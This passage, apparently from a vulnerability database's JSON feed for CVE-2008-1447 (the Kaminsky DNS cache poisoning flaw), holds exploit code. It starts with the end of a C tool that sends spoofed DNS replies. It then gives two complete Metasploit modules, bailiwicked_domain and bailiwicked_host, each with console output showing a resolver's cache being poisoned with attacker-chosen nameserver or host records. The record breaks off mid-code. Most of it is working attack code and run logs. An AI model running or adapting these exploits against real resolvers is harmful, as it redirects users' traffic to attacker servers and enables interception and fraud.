exit(1);\r\n printf("Chance of success: 1-(1-%d/65536)**%d = %.2f\\n", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\r\n srand(time(NULL));\r\n int unique = rand() + (rand() << 16);\r\n u_char buf[IP_LEN_MAX];\r\n unsigned len;\r\n char name[256];\r\n char ns[256];\r\n ip_t *iph;\r\n if ((iph = ip_open()) == NULL)\r\n err(1, "ip_open");\r\n int cnt = 0;\r\n while (cnt < 
attempts)\r\n {\r\n // send a query for a random hostname\r\n snprintf(name, sizeof (name), "%08x%08x.%s", unique, cnt, domain);\r\n len = build_query(buf, querier, ip_resolver, name);\r\n if (ip_send(iph, buf, len) != len)\r\n err(1, "ip_send");\r\n // give the resolver enough time to forward the query and be in a state\r\n // where it waits for answers; sleeping 10ms here limits the number of\r\n // attempts to 100 per sec\r\n usleep(10000);\r\n // send spoofed replies, each reply contains:\r\n // - 1 query: query for the "random hostname"\r\n // - 1 answer: "random hostname" A 1.1.1.1\r\n // - 1 authoritative nameserver: <domain> NS <subhost>.<domain>\r\n // - 1 additional record: <subhost>.<domain> A <any-ip>\r\n snprintf(ns, sizeof (ns), "%s.%s", subhost, domain);\r\n unsigned r;\r\n for (r = 0; r < replies; r++)\r\n {\r\n // use a txid that is just 'r': 0..(replies-1)\r\n len = build_response(buf, ip_authoritative, ip_resolver,\r\n port_resolver, r, name, "1.1.1.1", domain, ns, anyip);\r\n if (ip_send(iph, buf, len) != len)\r\n err(1, "ip_send");\r\n }\r\n cnt++;\r\n }\r\n ip_close(iph);\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9178", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_domain.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68473", "href": "https://packetstormsecurity.com/files/68473/bailiwicked_domain.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n 
\n===============/======================================================== \nExploit ID: CAU-EX-2008-0003 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_domain.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious nameserver \nentry into the target nameserver which replaces the legitimate \nnameservers for the target domain. By causing the target nameserver to \nquery for random hostnames at the target domain, the attacker can spoof \na response to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. This insertion completely replaces the original nameserver \nrecords for the target domain. 
\n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n## ### ## ## \n## ## #### ###### #### ##### ##### ## #### ###### \n####### ## ## ## ## ## ## ## ## ## ## ### ## \n####### ###### ## ##### #### ## ## ## ## ## ## ## \n## # ## ## ## ## ## ## ##### ## ## ## ## ## \n## ## #### ### ##### ##### ## #### #### #### ### \n## \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 73 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_domain \nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D \nRHOST => A.B.C.D \nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com \nDOMAIN => example.com \nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com \nNEWDNS => dns01.metasploit.com \nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0 \nSRCPORT => 0 \nmsf auxiliary(bailiwicked_domain) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \nb.iana-servers.net. \na.iana-servers.net. \n \nmsf auxiliary(bailiwicked_domain) > run \n[*] Switching to target port 50391 based on Metasploit service \n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. \n[*] Querying recon nameserver for address of b.iana-servers.net.... \n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 \n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... \n[*] b.iana-servers.net. 
is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. \n[*] Querying recon nameserver for address of a.iana-servers.net.... \n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 \n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... \n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Sent 8000 queries and 160000 spoofed responses... \n[*] Sent 9000 queries and 180000 spoofed responses... \n[*] Sent 10000 queries and 200000 spoofed responses... \n[*] Sent 11000 queries and 220000 spoofed responses... \n[*] Sent 12000 queries and 240000 spoofed responses... \n[*] Sent 13000 queries and 260000 spoofed responses... \n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com \n[*] Auxiliary module execution completed \n \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \ndns01.metasploit.com. \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. 
\n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Domain Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target \ndomains nameserver entries in a vulnerable DNS cache server. This attack works \nby sending random hostname queries to the target DNS server coupled with spoofed \nreplies to those queries from the authoritative nameservers for that domain. \nEventually, a guessed ID will match, the spoofed packet will get accepted, and \nthe nameserver entries for the target domain will be replaced by the server \nspecified in the NEWDNS option of this exploit. 
\n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5590 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), \nOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = 
t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \ndomain = datastore['DOMAIN'] + '.' \nnewdns = datastore['NEWDNS'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nnewttl = datastore['TTL'].to_i \nxidbase = rand(20001) + 20000 \n \naddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\") \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already poisoned \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nbegin \ncached = 
false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \n \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nt = Time.now + ttl \nprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\") \nprint_status(\" Cache entry expires on #{t.to_s}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \n \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? 
and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) \nreq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored \nreq.qr = 1 \nreq.aa = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n 
\n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68473/bailiwicked_domain.rb.txt"}, {"lastseen": "2016-12-05T22:20:49", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_host.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68471", "href": "https://packetstormsecurity.com/files/68471/bailiwicked_host.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0002 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_host.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit \nTested: BIND 9.4.1-9.4.2 
\nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious host entry \ninto the target nameserver. By causing the target nameserver to query \nfor random hostnames at the target domain, the attacker can spoof a \nresponse to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n_ _ _ _ \n| | | | (_) | \n_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ \n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __| \n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_ \n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__| \n| | \n|_| \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 72 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_host \nmsf auxiliary(bailiwicked_host) > show options \n \nModule options: \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nHOSTNAME pwned.example.com yes Hostname to hijack \nNEWADDR 1.3.3.7 yes New address for hostname \nRECONS 208.67.222.222 yes Nameserver used for reconnaissance \nRHOST yes The target address \nSRCPORT yes The target server's source query port (0 for automatic) \nXIDS 10 yes Number of XIDs to try for each query \n \nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D \nRHOST => A.B.C.D \n \nmsf auxiliary(bailiwicked_host) > check \n[*] Using the Metasploit service to verify 
exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \n \nmsf auxiliary(bailiwicked_host) > set SRCPORT 0 \nSRCPORT => 0 \n \nmsf auxiliary(bailiwicked_host) > run \n[*] Switching to target port 48178 based on Metasploit service \n[*] Targeting nameserver A.B.C.D \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got answer with 2 answers, 0 authorities \n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com. \n[*] Querying recon nameserver for address of ns89.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45 \n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com.... \n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com. \n[*] Querying recon nameserver for address of ns90.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45 \n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com.... \n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... 
\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7 \n[*] Auxiliary module execution completed \nmsf auxiliary(bailiwicked_host) > \n \nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D \n[*] exec: nslookup pwned.example.com A.B.C.D \n \nServer: A.B.C.D \nAddress: A.B.C.D#53 \n \nNon-authoritative answer: \nName: pwned.example.com \nAddress: 1.3.3.7 \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Host Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single \nmalicious host entry into the target nameserver by sending random sub-domain \nqueries to the target DNS server coupled with spoofed replies to those \nqueries from the authoritative nameservers for the domain which contain a \nmalicious host entry for the hostname to be poisoned in the authority and \nadditional records sections. Eventually, a guessed ID will match and the \nspoofed packet will get accepted, and due to the additional hostname entry \nbeing within bailiwick constraints of the original request the malicious host \nentry will get cached. 
\n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5585 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ], \n], \n'Privileged' => true, \n'Targets' => \n[ \n[\"BIND\", \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n}, \n], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), \nOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: 
#{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \nhostname = datastore['HOSTNAME'] + '.' \naddress = datastore['NEWADDR'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nttl = datastore['TTL'].to_i \nxidbase = rand(4)+2*10000 \n \ndomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0] \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already cached \nbegin \nquery = 
Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nt = Time.now + ttl \nprint_status(\"Failure: This hostname is already in the target cache: #{name} == #{address}\") \nprint_status(\" Cache entry expires on #{t.to_s}... sleeping.\") \ncached = true \nsleep ttl \nend \nend \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for 
